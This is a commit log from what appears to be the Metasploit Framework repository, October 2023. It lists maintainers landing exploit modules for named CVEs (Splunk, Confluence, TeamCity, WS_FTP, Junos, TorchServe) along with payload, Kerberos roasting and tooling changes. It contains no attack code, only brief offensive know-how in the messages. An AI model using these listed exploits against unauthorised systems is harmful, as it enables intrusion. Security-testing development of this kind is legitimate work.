Compare commits

...

1010 Commits

Author SHA1 Message Date
Metasploit 0cae369a45 automatic module_metadata_base.json update 2023-10-26 10:49:41 -05:00
Zach Goldman d960aa522c Land #18348, Splunk account take over (CVE-2023-32707) leading to RCE 2023-10-26 11:34:02 -04:00
dwelch-r7 816048b9f5 Land #18479, No longer clear remote service msfdb creds by default 2023-10-26 15:09:00 +01:00
Heyder Andrade e5e58bc0be Update modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
Co-authored-by: Zach Goldman <106169455+zgoldman-r7@users.noreply.github.com>
2023-10-26 14:03:06 +02:00
adfoster-r7 b58f963355 Land #18299, extend error message for timeouts to include more detail to user 2023-10-26 00:21:22 +01:00
adfoster-r7 216f6fbfc5 Land #18466, Replace grep with getent in entrypoint.sh 2023-10-25 21:22:26 +01:00
adfoster-r7 93645c23ac Land #18403, Fix FileDropper to properly clone string variables before storing them 2023-10-25 20:55:06 +01:00
Metasploit a503152236 automatic module_metadata_base.json update 2023-10-25 12:55:11 -05:00
Christophe De La Fuente 9e5e57390f Land #18194, Useradd post module 2023-10-25 19:29:59 +02:00
Christophe De La Fuente 14a5aaab98 Fix small typo 2023-10-25 19:28:23 +02:00
Zach Goldman 862e738015 extend error message for timeouts to include more detail to user
initial functionality, testing/cleanup still needed

script and command functionality

remove unnecessary accessor

switch puts to print_error in proc

ensure proc is reset, run on every error, add yard docs

fix yard, refactor/remove dead code

rename on_error_proc
2023-10-25 11:08:00 -05:00
dwelch-r7 9e77eba39b Land #18487, Fix flakey test failure 2023-10-25 14:45:00 +01:00
adfoster-r7 a97cc128f7 Fix flakey test failure 2023-10-25 14:09:34 +01:00
Heyder Andrade c0af43c10b Update modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
Co-authored-by: Zach Goldman <106169455+zgoldman-r7@users.noreply.github.com>
2023-10-25 11:02:30 +02:00
Metasploit 70ae201d5f automatic module_metadata_base.json update 2023-10-24 10:55:19 -05:00
Christophe De La Fuente ff9639e6a6 Land #18460, VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE 2023-10-24 17:32:28 +02:00
adfoster-r7 96a04265c7 Land #18470, Adds wiki guide for session searching and killing stale sessions 2023-10-24 15:30:46 +01:00
Christophe De La Fuente 59c277ba67 Land #18737, Add DB Stats Command to Console 2023-10-24 16:12:39 +02:00
Heyder Andrade 5e19c8fd88 Update splunk_privilege_escalation_cve_2023_32707.rb 2023-10-24 14:44:27 +02:00
Zach Goldman 8331f4d2ad Adds wiki guide for session searching
Also tweaks an error message

add readme to directory
2023-10-23 15:33:53 -05:00
h00die 3bf880192e review comments 2023-10-23 10:28:33 -04:00
h00die 0d2a5795fe total to bottom 2023-10-23 10:28:33 -04:00
h00die ed78df0f0f add creds and klist to db_stats 2023-10-23 10:28:33 -04:00
h00die 7452cda2b1 db_stats review comments 2023-10-23 10:28:33 -04:00
h00die 5f2703f8c0 add stats command 2023-10-23 10:28:33 -04:00
Christophe De La Fuente b0b4da543d Land #18400, Kerberos ticket_search fix passing in a workspace 2023-10-23 16:17:24 +02:00
Christophe De La Fuente 77a8b0efa2 Land #18421, Save Kerberos tickets in the MSF cache upon a successful login 2023-10-23 15:25:09 +02:00
adfoster-r7 5efaa32bd0 No longer clear msfdb creds by default 2023-10-23 11:55:24 +01:00
h00die fa71d8b6e2 set all targets to dynamically build list 2023-10-23 06:54:38 -04:00
h00die 97f9edb5f7 review 2023-10-23 06:35:23 -04:00
Heyder Andrade 1ac0e2dc66 Update splunk_privilege_escalation_cve_2023_32707.md 2023-10-23 11:31:19 +02:00
Metasploit a3c5ca6cc1 automatic module_metadata_base.json update 2023-10-19 16:59:52 -05:00
Spencer McIntyre 15aaa90379 Land #18447, CVE-2023-22515 Confluence Auth Bypass
CVE-2023-22515 - Atlassian Confluence Data Center and Server Authentication Bypass
2023-10-19 17:35:17 -04:00
Spencer McIntyre ee0e5b9eda Tidy the docs, fix the username
The username can not contain capital letters, or the operation will
fail.
2023-10-19 17:19:55 -04:00
Emir Polat c79cc5a36b Final Checks 2023-10-19 17:19:55 -04:00
Emir Polat b3a9579e8a Update modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
Implement changes proposed by Spencer McIntyre (smcintyre-r7)
2023-10-19 17:19:30 -04:00
emirpolatt 258ac6421b Fix fail_with response code compare and documentation fixes 2023-10-19 17:19:30 -04:00
emirpolatt 7c977e07ef Remove of the X-Atlassian-Token header from server-info.action 2023-10-19 17:19:30 -04:00
emirpolatt 236a301f27 Check method fixes
get_confluence_version inside to check method. Also new status messages
2023-10-19 17:19:08 -04:00
Metasploit 30e1930444 Bump version of framework to 6.3.40 2023-10-19 12:08:32 -05:00
dwelch-r7 7baabd08db Land #18364, Add support for filtering sessions 2023-10-19 16:40:42 +01:00
Zach Goldman b4b73529d3 add -e flag for stale sessions
remove single flag

pivot to search flag

added support for search session type

adds search session id support

remove stale references

reshuffle code

fix time parsing, add command support

fix search list, reduce duplicated code

testing added

killall with search lists table of killed sessions

sessions are no longer represented by ids

addresses feedback on code structure and search behavior

some test reshuffling, switch raised errors to printed ones

add checkin validation, rest of cmd_sessions tests

add time parsing test

refactoring

test reformatting and adjusted error validation

make error handling more explicit, add test context

fixes

sub quotes, make constant

rubocopping

switch before and after to greater than and less than

mbetter incorporate constants

update example
2023-10-19 09:41:18 -05:00
Metasploit dba2ac88f0 automatic module_metadata_base.json update 2023-10-19 03:44:02 -05:00
Christophe De La Fuente da9d04d32d Land #18461, CVE-2023-22515 - Atlassian Confluence unauthenticated RCE 2023-10-19 10:22:57 +02:00
Patryk Krawaczyński ce10038546 Replace grep with getent in entrypoint.sh
Use native "getent" command to get entries from NSS insead of "grep".
2023-10-18 15:38:21 +02:00
sfewer-r7 c63aaba760 add in documentation for Options 2023-10-18 10:05:05 +01:00
sfewer-r7 5e84f57ab3 set :random to true during generate_jar so we can randomize teh metasploit class path 2023-10-18 09:53:46 +01:00
sfewer-r7 fcffd36af0 no need to test for true, jsut return the value as we are waiting for done to be set to true 2023-10-18 09:37:04 +01:00
sfewer-r7 9fdbccb74f catch a JSON ParserError exception and fail_with() if needed. Also detect if the JSON data doesnt have the expected value and fail_with() if needed 2023-10-18 09:36:02 +01:00
h00die 00b534dbed review 2023-10-17 13:17:10 -04:00
Christophe De La Fuente 0b7a1bfcf7 Use #dup instead of #clone #2 2023-10-17 12:39:23 +02:00
sfewer-r7 34107e4f3b favod over for string concatenation. 2023-10-17 11:36:07 +01:00
Christophe De La Fuente 5f438f729d Use #dup instead of #clone 2023-10-17 12:19:03 +02:00
sfewer-r7 0fc35bf6d3 randomize the plugins version number 2023-10-17 10:01:02 +01:00
sfewer-r7 415bd49b15 use next semantics to return from a yielded block early (note we cannot use return for this) 2023-10-17 09:43:00 +01:00
sfewer-r7 54f334479a fix another typo 2023-10-17 09:30:52 +01:00
sfewer-r7 9e6e9538e1 typo 2023-10-17 09:29:38 +01:00
sfewer-r7 d2438bad4e add a note to explain we need to concat a trailing forward slash 2023-10-17 09:28:04 +01:00
sfewer-r7 4acdaf3087 typos 2023-10-17 09:22:09 +01:00
sfewer-r7 d17f065f12 remove 'localhost' in favor of some random chars 2023-10-17 09:21:28 +01:00
sfewer-r7 3242a7009b clarify timeout is in seconds 2023-10-17 09:11:05 +01:00
sfewer-r7 b97cb9f63d remove whitespace 2023-10-17 09:10:28 +01:00
sfewer-r7 1c027ac05c add an RCE exploit for CVE-2023-22515 2023-10-16 20:50:18 +01:00
h00die b94d278003 vmware aria ssh keys exploit 2023-10-16 14:47:04 -04:00
h00die ba82b59ec2 vmware aria ssh keys exploit 2023-10-16 13:43:15 -04:00
h00die f394b4a8ed vmware aria ssh keys exploit 2023-10-16 13:42:58 -04:00
h00die 263eaf7d95 vmware aria ssh keys exploit 2023-10-16 13:42:27 -04:00
h00die b3b1595ef4 vmware aria ssh keys exploit 2023-10-16 13:06:17 -04:00
adfoster-r7 ec5648f6c5 Land #18452, Update Writing Module Docs to reference msftidy_docs.rb 2023-10-13 17:55:16 +01:00
jheysel-r7 4ff3c0f102 Update docs/metasploit-framework.wiki/Writing-Module-Documentation.md 2023-10-13 11:58:01 -04:00
Jack Heysel 2464c43151 Update Writing Module Docs to reference msftidy_docs.rb 2023-10-13 11:26:19 -04:00
Jack Heysel 718cdd9a6b Land #18428, Add mssql_login docs
This PR adds a documentation file for the mssql_login scanner.
2023-10-13 10:56:58 -04:00
cgranleese-r7 d2607c7a77 Land #18451, Update creds cracked password to work with remote database 2023-10-13 13:15:59 +01:00
Metasploit 5d6b63c8ef automatic module_metadata_base.json update 2023-10-13 06:51:04 -05:00
adfoster-r7 941c44f9ad Update creds cracked password to work with remote database 2023-10-13 12:30:27 +01:00
adfoster-r7 bb19151891 Land #17689, adding a new column cracked password in creds command to show cracked passwords 2023-10-13 12:25:51 +01:00
cgranleese-r7 44e5a93add Land #18442, Improve stability of msfdb initialization on windows environments 2023-10-13 12:21:02 +01:00
cgranleese-r7 e1a307e03a Land #18450, Add support for ruby 3.3.0-preview2 2023-10-13 11:55:43 +01:00
cgranleese-r7 9def455f65 Land #18449, Update mysql authbypass hashdump module to correctly close sockets 2023-10-13 11:43:59 +01:00
cgranleese-r7 a1b3c8dc5f Land #18438, Improve UX for database management prompts 2023-10-13 11:16:37 +01:00
adfoster-r7 5f6b8dc7ef Land #18381, Add option to reload all libs when calling run or check on a module 2023-10-13 11:06:10 +01:00
cgranleese-r7 03433652e8 Land #18443, Fix reverse ssh handler warnings on windows bootup 2023-10-13 10:24:31 +01:00
emirpolatt 0cb56c1de5 Some fixes 2023-10-13 02:16:17 -07:00
emirpolatt e48ead5e8c Fingerprint reduction with Rex::Text.rand_text_alpha(8) 2023-10-13 02:11:57 -07:00
emirpolatt 84f5c7321e Reducing fingerprinting via Rex::Text.rand_text_alpha(8) 2023-10-13 02:02:13 -07:00
emirpolatt 9219a3e90a Adding AttackerKB analysis URL 2023-10-13 01:56:14 -07:00
adfoster-r7 b81252e34f Add support for ruby 3.3.0-preview2 2023-10-13 01:41:10 +01:00
Metasploit 2163c51a2e automatic module_metadata_base.json update 2023-10-12 16:34:40 -05:00
Spencer McIntyre 05dd2e1473 Land #18351, Apache Superset RCE (CVE-2023-37941) 2023-10-12 17:10:10 -04:00
jheysel-r7 82a1dfa9ff Added new line at EOF 2023-10-12 16:17:20 -04:00
jheysel-r7 820f806a5e Apply suggestions from code review 2023-10-12 15:56:08 -04:00
jheysel-r7 77694db215 Apply suggestions from code review 2023-10-12 15:53:48 -04:00
jheysel-r7 6c035dada0 Apply suggestions from msftidy_docs 2023-10-12 15:53:26 -04:00
Metasploit fb77febe3e Bump version of framework to 6.3.39 2023-10-12 12:08:36 -05:00
Jack Heysel d31a485d63 Land #18383, improves enum_computers module
This PR adds a variety of improvements to the
enum_computers module including shell and powershell
support as well as improvements to run on non-english
systems.
2023-10-12 13:01:54 -04:00
Metasploit 2fca548b31 automatic module_metadata_base.json update 2023-10-12 11:42:37 -05:00
adfoster-r7 075fe09c2f Fix mysql authbypass running out of sockets 2023-10-12 17:40:33 +01:00
adfoster-r7 80d2fa738d Land #18296, update more mysql modules to support newer authentication methods 2023-10-12 17:19:02 +01:00
Metasploit 01ce90ae8a automatic module_metadata_base.json update 2023-10-12 11:04:40 -05:00
Jack Heysel 1719d55c63 Land #18427, Add TorchServer SSRF + RCE module
This PR adds a module that exploits a series of vulns
which leads to RCE on affected TorchServers tagrets. It
also includes updates the the class_loader library.
2023-10-12 11:29:20 -04:00
Spencer McIntyre 86b7ec4518 Address comments from the review 2023-10-12 09:50:19 -04:00
Spencer McIntyre de8e392b7b Only randomize the URI once 2023-10-12 09:50:19 -04:00
Spencer McIntyre 5577413bd9 Add additional classes for payload loading
This fixes the java/shell_reverse_tcp payload
2023-10-12 09:27:26 -04:00
Spencer McIntyre 4f734379d3 Add module docs and print some messages 2023-10-12 09:27:26 -04:00
Spencer McIntyre 0799f9d860 Add a check method and populate module metadata 2023-10-12 09:27:26 -04:00
Spencer McIntyre f712c67441 Support URIPATH in Java::HTTP::ClassLoader
The URIPATH must end with / due to how the package names are requested
from the web server in a nested directory structure. #on_request_uri
also needed to be updated to check for the relative resource.
2023-10-12 09:27:26 -04:00
Spencer McIntyre 7a226ba285 Randomize components in the MAR file 2023-10-12 09:27:26 -04:00
Spencer McIntyre 5a6dc7f9a6 Initial commit of CVE-2023-43654 2023-10-12 09:27:26 -04:00
Rory McKinley 1b172768b4 Use upstream ruby-mysql in Remote::MYSQL
* ... and dependents
2023-10-12 13:08:35 +02:00
cgranleese-r7 3da17d2775 Addresses PR feedback 2023-10-12 10:59:29 +01:00
h00die 862a7930dc Merge pull request #25 from smcintyre-r7/pr/collab/18351
Pr/collab/18351
2023-10-11 15:30:28 -04:00
Jack Heysel 7f4a9c47fc Land #18355, Fixes OpenJDK reflection issue.
This PR updates metasploit-framework side for the
metasploit-payloads fix #672. This PR also includes
metasploit-framework PR #18445 which bumps the
metasploit-payloads gem version to 2.0.156.
2023-10-11 15:26:09 -04:00
emirpolatt 2b05dab554 Fix: Msftidy Warnings 2023-10-11 12:19:40 -07:00
emirpolatt b8dcafc0f6 Revert "CVE-2023-27253 - PfSense 2.6.0 'Backup & Restore' OS Command Injection Module"
This reverts commit c65685deae.
2023-10-11 12:15:22 -07:00
emirpolatt 9ef1d1746a CVE-2023-22515 - Atlassian Confluence Data Center and Server Broken Access Control Leads to Authentication Bypass 2023-10-11 12:09:22 -07:00
Ashley Donaldson 874366588c Update metasploit side for java metasploit-payloads fix 2023-10-11 15:00:19 -04:00
Spencer McIntyre 7f7f106b92 Update metasploit-payloads gem to 2.0.156
Includes changes from:
* rapid7/metasploit-payloads#672
* rapid7/metasploit-payloads#678
2023-10-11 14:05:45 -04:00
adfoster-r7 6c33bf95f1 Land #18411, Fix incorrect scope condition when populating RHOSTS using services command 2023-10-11 13:29:31 +01:00
adfoster-r7 0e62f3c5cd Land #18444, spelling fixes on docs 2023-10-11 13:24:53 +01:00
h00die 7ffc1ca491 undo some spelling fixes when upstream has those issues 2023-10-11 06:30:11 -04:00
bwatters 6af8d3f6e6 Land #18431, Fix how port forwards are listed
Merge branch 'land-18431' into upstream-master
2023-10-10 16:56:11 -05:00
Spencer McIntyre 45be501a50 Raise a more specific error message
Check for and raise a more specific error message when the internal
database fails to mount because the path is incorrect.
2023-10-10 15:21:35 -04:00
h00die 557a15a115 spelling fixes on docs 2023-10-10 14:46:18 -04:00
Spencer McIntyre 47b0c01d58 Make the add_equals_to_base64 function private 2023-10-10 14:16:56 -04:00
Spencer McIntyre 59da2865d9 Use an exec-in-place gadget for Python
This adds a Python deserialization gadget that will exec arbitrary
Python code in place. It is only compatible with Python 3.x due to
differences in Python's exec function and statement between 2 and 3.
2023-10-10 14:01:24 -04:00
adfoster-r7 0c407945a0 Fix reverse ssh handler warnings on windows bootup 2023-10-10 15:26:24 +01:00
adfoster-r7 723557365a Improve stability of msfdb initialization on windows environments 2023-10-10 15:25:10 +01:00
adfoster-r7 d427d64f6e Land #18435, wiki spelling fixes 2023-10-10 10:48:44 +01:00
adfoster-r7 0875cc8f73 Improve UX for databse management prompts 2023-10-09 11:04:34 +01:00
h00die 76f5582a1a artica not artical or article 2023-10-06 19:55:40 -04:00
h00die 15413416a7 wiki spelling fixes 2023-10-06 19:51:39 -04:00
Metasploit b32fe19545 automatic module_metadata_base.json update 2023-10-06 16:55:04 -05:00
Jack Heysel fb834b235a Land #18417, Add Kibana Upgrade Assistant RCE
Kibana before version 7.6.3 suffers from a prototype
pollution bug within the Upgrade Assistant. This PR adds
an exploit module to exploit the bug. There is no CVE
for this issue at the moment.
2023-10-06 17:29:02 -04:00
jheysel-r7 fe9afc94c7 Update documentation/modules/exploit/linux/http/kibana_upgrade_assistant_telemetry_rce.md 2023-10-06 16:45:52 -04:00
adfoster-r7 f7635b18e2 Land #18433, Remove reline dependency update 2023-10-06 18:13:59 +01:00
adfoster-r7 5e7097197d Remove reline dependency update 2023-10-06 17:56:06 +01:00
adfoster-r7 93fb0dd3b3 Land #18171, Enable using modules when deferred loading is turned on 2023-10-06 17:41:18 +01:00
dwelch-r7 022dca4b10 Land #18432, Update gem dependencies 2023-10-06 16:36:16 +01:00
Dean Welch ef871685af Revert accidental changes 2023-10-06 16:04:38 +01:00
Dean Welch 9eb4385a25 Get stats from the cache instead of from frameworks list of loaded modules 2023-10-06 16:04:38 +01:00
Dean Welch d60993f7e8 Enable using modules when deferred loading is turned on 2023-10-06 16:04:34 +01:00
adfoster-r7 d11f15b9af Update gem dependencies 2023-10-06 15:49:06 +01:00
h00die 931a67d290 kibana telemetry rce rewritten to use fetch payloads 2023-10-06 09:55:10 -04:00
dwelch-r7 9372d9c063 Land #18430, Add pin to rails 7.0.x 2023-10-06 14:49:42 +01:00
adfoster-r7 88c849de74 Add pin to rails 7.0.x 2023-10-06 14:08:57 +01:00
Spencer McIntyre d46e80f17f Fix how port forwards are listed
Fixes #18291
2023-10-06 09:04:28 -04:00
h00die a2a9becc73 convert cmd_stager to fetch payloads 2023-10-06 07:40:17 -04:00
adfoster-r7 f3c105916a Land #18256, general dependency update 2023-10-06 10:27:57 +01:00
aleksa 1bd7d25088 mssql_login documentation added. 2023-10-05 17:06:11 -04:00
bwatters a1304fe1a8 Land #18394, Add documentation for auxiliary/scanner/http/http_traversal module
Merge branch 'land-18394' into upstream-master
2023-10-05 15:18:20 -05:00
h00die 5e0538a239 review comments round 1 2023-10-05 13:12:33 -04:00
Metasploit ec33707381 Bump version of framework to 6.3.38 2023-10-05 12:08:28 -05:00
Simon Janusz faa3dd6b85 Land #18372, Fix error downloading a file from generic shell 2023-10-05 17:47:27 +01:00
cgranleese-r7 dff907b6ca Land #18425, Add history support to nasm and metasm shells 2023-10-05 17:20:31 +01:00
adfoster-r7 1f6009333e Add history support to nasm and metasm shells 2023-10-04 22:36:19 +01:00
bwatters 1ee7f03a2b Land #18420, Update user agent strings
Merge branch 'land-18420' into upstream-master
2023-10-04 14:13:04 -05:00
bwatters 4d369a8e52 Land #18424, Fix documentation for CVE-2023-40044 exploit module.
Merge branch 'land-18424' into upstream-master
2023-10-04 13:58:20 -05:00
bwatters 6cea8f750f Land #18277, Add new doc for writing a command injection exploit module
Merge branch 'land-18277' into upstream-master
2023-10-04 13:54:59 -05:00
bwatters a16379b2a7 Land #17919, Post::Windows::Service: Support start/stop service on shell sessions
Merge branch 'land-17919' into upstream-master
2023-10-04 13:51:25 -05:00
Jack Heysel 81e4f94869 Land #18412, Add a couple tips to metasploit 2023-10-04 13:45:33 -04:00
sfewer-r7 623b589fb5 When I removed the PowerShell target I forgot to update the documentation, this commit updates the documentation to reflect the changes made to the exploit module. 2023-10-04 17:03:28 +01:00
Metasploit 75225d0757 automatic module_metadata_base.json update 2023-10-04 09:37:46 -05:00
Spencer McIntyre 9eb0c336ab Land #18414, Exploit module for CVE-2023-40044
Exploit module for CVE-2023-40044 (WS_FTP unauthenticated RCE)
2023-10-04 10:21:54 -04:00
sjanusz-r7 126c19890a Add option to reload all libs when running a module 2023-10-04 14:59:36 +01:00
Adam Robinson 329b4649e4 Approving cortex.yaml
PD-41096 Auto-add cortex.yaml
2023-10-04 12:44:40 +01:00
sfewer-r7 8431d11654 leverage Rex::MIME::Message instead of creating the multipart data manualy 2023-10-04 09:39:25 +01:00
sfewer-r7 ccd8c71ec6 change the payload space to 5000. This allows all the payloads I tested to work but also allows all the 3 gadget chains I tested to work. ClaimsPrincipal and TypeConfuseDelegate will fail if the space is too large. 2023-10-04 09:38:42 +01:00
bwatters 6aeffa5a17 Land #18363, Add support to msfvenom for "-f octal
Merge branch 'land-18363' into upstream-master
2023-10-03 16:21:57 -05:00
sfewer-r7 1be8e0245b remove the powershell target as the powershell command adapter will handle this for us (thanks Spencer). Increate the space to handle the larger powershell command lines. I tested with cmd/windows/powershell/x64/meterpreter/reverse_tcp and the powershell command length was 4404. 2023-10-03 17:48:37 +01:00
Metasploit 5dd2408b5c automatic module_metadata_base.json update 2023-10-03 06:45:57 -05:00
adfoster-r7 14c42fcefc Land #18405, Show errors on inaccessible payload files 2023-10-03 12:22:04 +01:00
sfewer-r7 2eacb75feb Add a reference to the AssetNote blog. Better describe what teh TARGET_URI option is for and why it defaults to /AHT/ 2023-10-03 11:17:21 +01:00
cgranleese-r7 92867ceed8 Land #18347, Update check method docs 2023-10-03 10:09:29 +01:00
cgranleese-r7 87d108aab5 Removes Meterpreter logic 2023-10-03 09:53:02 +01:00
Ashley Donaldson 4d87d4e114 Save Kerberos tickets in the MSF cache upon a successful login 2023-10-03 13:45:41 +11:00
Ashley Donaldson 2deb3a831a Update user agent strings 2023-10-03 11:47:23 +11:00
h00die 88eb44be64 kibana telemetry rce 2023-10-02 16:53:20 -04:00
Spencer McIntyre 3baf867c76 Update lib/msf/ui/tip.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-10-02 16:38:26 -04:00
bwatters 42f6bb8212 Update on feedback from jmartin 2023-10-02 14:29:20 -05:00
Jack Heysel 50e4269c05 Land #18338, Get crackable ASREP hashes
This PR fixes the ASREP roasting workflow and resolves
issue #17988.
2023-10-02 13:26:43 -04:00
sfewer-r7 1695a12c9c Explicitly state both the release name (e.g. 2022.0.2) and the version number (e.g. 8.8.2) in a more consistent way. 2023-10-02 17:40:11 +01:00
Metasploit b078e8e08f automatic module_metadata_base.json update 2023-10-02 10:18:33 -05:00
Jack Heysel 5087e0ffe3 Land #18197, Ldap login scanner module
Adds a new login scanner module for LDAP
2023-10-02 10:56:56 -04:00
sjanusz-r7 e70f356239 Show errors on inaccessible payload files 2023-10-02 14:46:25 +01:00
Simon Irwin 6cefa8f3d2 PD-41096 Auto-add cortex.yaml 2023-10-02 14:13:52 +01:00
Dean Welch 76a25c6937 Don't store creds for successful schannel ldap auth 2023-10-02 13:42:25 +01:00
adfoster-r7 c728671953 Land #18393, Update using metasploit docs 2023-10-02 13:37:54 +01:00
sfewer-r7 53ed4a632b add in exploit module for CVE-2023-40044 - WS_FTP unauthenticated RCE via .NET deserialization. 2023-10-02 11:42:19 +01:00
Metasploit 276b0ca53e automatic module_metadata_base.json update 2023-09-29 11:38:38 -05:00
Christophe De La Fuente 50155e3d94 Land #18389, Juniper Junos OS PHPRC Manipulation RCE (CVE-2023-36845) 2023-09-29 18:05:28 +02:00
Spencer McIntyre 5aee82e35a Add a couple of tips 2023-09-29 11:47:27 -04:00
Jack Heysel 37bc4ca51f Fixed root password resetting 2023-09-29 11:40:03 -04:00
Erik Geiser 49786101f7 Fix incorrect scope condition 2023-09-29 13:51:14 +02:00
Jack Heysel 2928d47312 Merge branch 'junos_phprc_auto_prepend_file' of github.com:jheysel-r7/metasploit-framework into junos_phprc_auto_prepend_file 2023-09-28 14:43:46 -04:00
Jack Heysel 58642c16c9 Changed WebSocket to SSH 2023-09-28 14:41:03 -04:00
jheysel-r7 4fecb4d2e2 Update documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-09-28 14:37:36 -04:00
Metasploit 8de942d9d9 Bump version of framework to 6.3.37 2023-09-28 13:32:45 -05:00
Jack Heysel 3f15de3995 Responded to Christophes suggestions 2023-09-28 14:26:37 -04:00
Metasploit d65db4580f automatic module_metadata_base.json update 2023-09-28 13:17:31 -05:00
Spencer McIntyre 36d8a34d39 Land #18408, JetBrains TeamCity CVE-2023-42793 2023-09-28 14:01:59 -04:00
Spencer McIntyre e7ab983279 Minor code changes
Changes include:
  * Remove the PAYLOAD key which didn't do anything
  * Add the missing payload size constraint
  * Use #retry_until_truthy
2023-09-28 13:19:26 -04:00
sfewer-r7 89940e8b08 use the correct naming convention for normal options. 2023-09-28 16:36:18 +01:00
sfewer-r7 9a6e2dab71 improve the check routine to explicitly look for either a header value or a cookie value that TeamCity is known to set 2023-09-28 16:28:16 +01:00
sfewer-r7 96568bf6d3 typo in comment 2023-09-28 16:05:46 +01:00
sfewer-r7 ad7ff705c7 add in a Linux target 2023-09-28 14:57:02 +01:00
sfewer-r7 fbd5e60cfc add in coverage for CVE-2023-42793. Currently only a Windows target. 2023-09-28 12:31:59 +01:00
Jeffrey Martin 5310d00d85 more general updates for security hygiene
* updates to sshkey adds support for ECDSA
* skips irb update due to added dependencies on psych that has added native build requirements
2023-09-27 15:45:49 -05:00
Jeffrey Martin ef27b6124f general dependency update
* general maintenance update for all gems
* used for security review of current updates
2023-09-27 15:34:03 -05:00
Metasploit d5d2a5207b automatic module_metadata_base.json update 2023-09-27 10:31:47 -05:00
errorxyz 5060bb13a8 Fix docs format in modules/auxiliary/scanner/http/http_traversal 2023-09-27 20:47:31 +05:30
Christophe De La Fuente bc8179e36d Land #18406, Fix pass by reference bug on the module side for windows error exploit 2023-09-27 17:16:20 +02:00
bwatters a4c6b11237 Fix pass by reference bug on the module side 2023-09-27 09:43:32 -05:00
Metasploit cce28a9cbf automatic module_metadata_base.json update 2023-09-27 08:54:43 -05:00
Christophe De La Fuente 1058291af9 Land #18314, Windows Error Reporting RCE (CVE-2023-36874) 2023-09-27 15:25:06 +02:00
Christophe De La Fuente 2c9932b242 Update documentation - Options section 2023-09-27 15:17:04 +02:00
bwatters a929d7b856 Added LICENSE info 2023-09-27 07:54:05 -05:00
Jack Heysel 3eaa4adcb7 rubocop 2023-09-26 18:48:33 -04:00
Jack Heysel 9a1881cbcf jvoisin suggestions 2023-09-26 18:42:14 -04:00
Jack Heysel 09f3a98d13 Finished JAIL_BREAK addition 2023-09-26 16:45:28 -04:00
bwatters 0b84feaf60 updates from code review 2023-09-26 14:03:31 -05:00
Christophe De La Fuente 2232877d03 Properly clone the path strings before storing them 2023-09-26 13:26:02 +02:00
Jack Heysel b4539f174d Added JAIL_BREAK option and corresponding methods 2023-09-25 19:03:54 -04:00
Dean Welch c1abf37d0c Use passed in workspace if available, default to current workspace 2023-09-25 13:30:18 +01:00
adfoster-r7 aa2a8433fe Land #18399, fix multiple spelling mistakes 2023-09-25 10:00:54 +01:00
h00die d64ed33cdf code spell for a bunch of modules 2023-09-24 17:42:00 -04:00
bwatters be731f330e Add error checking and randomize the report directory 2023-09-22 14:43:21 -05:00
eu b1de44d892 Fix code styling 2023-09-22 16:51:49 +02:00
eu 4044835a64 Improve the cleanup method
- The cleanup methos is deleting the job and removing the app directory
- Added a change dir command as an AutoRunScript just to avoid the error when trying to access the current directory in the session
2023-09-22 15:45:40 +02:00
eu 47d8e4de04 Remove ReturnOutput option
TODO: distinguish commands that return output and commands that don't
2023-09-22 11:52:14 +02:00
cgranleese-r7 9c02331184 Land #18392, Remove raised exception in acceptance tests 2023-09-22 10:41:57 +01:00
Jack Heysel 127f0104d2 Address review comments 2023-09-21 13:36:00 -04:00
errorxyz e6f55d06ec Add documentation for auxiliary/scanner/http_traversal module 2023-09-21 22:59:10 +05:30
Metasploit 0d6aee89dd Bump version of framework to 6.3.36 2023-09-21 12:05:50 -05:00
joev 1b25ae5e14 Add comment explaining UNSUPPORTED_LANGS in spec. 2023-09-21 08:53:26 -06:00
joev 75e9a0a834 Add support for base32/64 comments.
* Explicitly documents lack of support for VB style comments.
2023-09-21 08:50:58 -06:00
adfoster-r7 e84d433dde Update using metasploit docs 2023-09-21 14:53:00 +01:00
adfoster-r7 14ded7aa67 Remove raised exception in acceptance tests 2023-09-21 14:47:06 +01:00
Jack Heysel 12de4dd2c7 Improved request sending and added watchtower ref 2023-09-21 09:45:59 -04:00
cgranleese-r7 6fdcc43530 Removes mixin 2023-09-21 14:35:13 +01:00
Ashley Donaldson a7f2165029 Send default etypes first, and fall back to RC4 if it doesn't require pre-auth 2023-09-21 21:22:25 +10:00
h00die 77c299d44b review comments 2023-09-21 06:45:27 -04:00
Metasploit a6adf814fe automatic module_metadata_base.json update 2023-09-21 04:45:44 -05:00
Christophe De La Fuente 1e69086d24 Land #18365, TOTOLINK X5000R Wireless GigaBit Router Unauthenticed RCE [CVE-2023-30013] 2023-09-21 11:27:19 +02:00
joev 1d2dde9f81 Add comment support for "octal" format.
* Adds failing test that discovers several additional violations.
2023-09-20 17:24:00 -06:00
h00die-gr3y 6e11f4353b Updates addressing cdelafuente-r7 comments 2023-09-20 22:14:48 +00:00
Jack Heysel da8c020d14 Junos OS SRX and EX PHPRC Manipulation RCE 2023-09-20 16:47:05 -04:00
joev b1606264da Fix incorrect parameter docstring. 2023-09-20 14:30:05 -06:00
joev 91ce4c3d9d Add new spec for Msf::Simple::Payload. 2023-09-20 14:29:47 -06:00
bwatters 03fa034ff5 Actually delete the file I told you to delete 2023-09-20 09:10:51 -05:00
Dean Welch 1609836ea2 Don't store passwords to creds if the password wasn't needed for the auth type 2023-09-20 14:30:06 +01:00
cgranleese-r7 461e661d06 Makes improvement to enum_computers module 2023-09-20 12:50:39 +01:00
Simon Janusz 1ef030df76 Land #18380, Fix broken test suite when running in small console window 2023-09-20 11:03:57 +01:00
Metasploit 2722067108 automatic module_metadata_base.json update 2023-09-20 04:18:57 -05:00
cgranleese-r7 37b506c238 Land #18374, fix related modules references 2023-09-20 10:03:47 +01:00
bwatters b4a1bb8fa2 Add docs and support for shell sessions; update exe to work without runtime lib. 2023-09-19 17:50:18 -05:00
Metasploit 4065d01c7d automatic module_metadata_base.json update 2023-09-19 03:50:09 -05:00
Christophe De La Fuente 525c957af2 Land #18333, Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-09-19 10:32:59 +02:00
Metasploit d594a5f5a0 automatic module_metadata_base.json update 2023-09-18 17:16:38 -05:00
bwatters bfa876c3a1 Land #18283, Apache Airflow 1.10.10 - Example DAG Remote Code Execution
CVE-2020-11978 + CVE-2020-13927

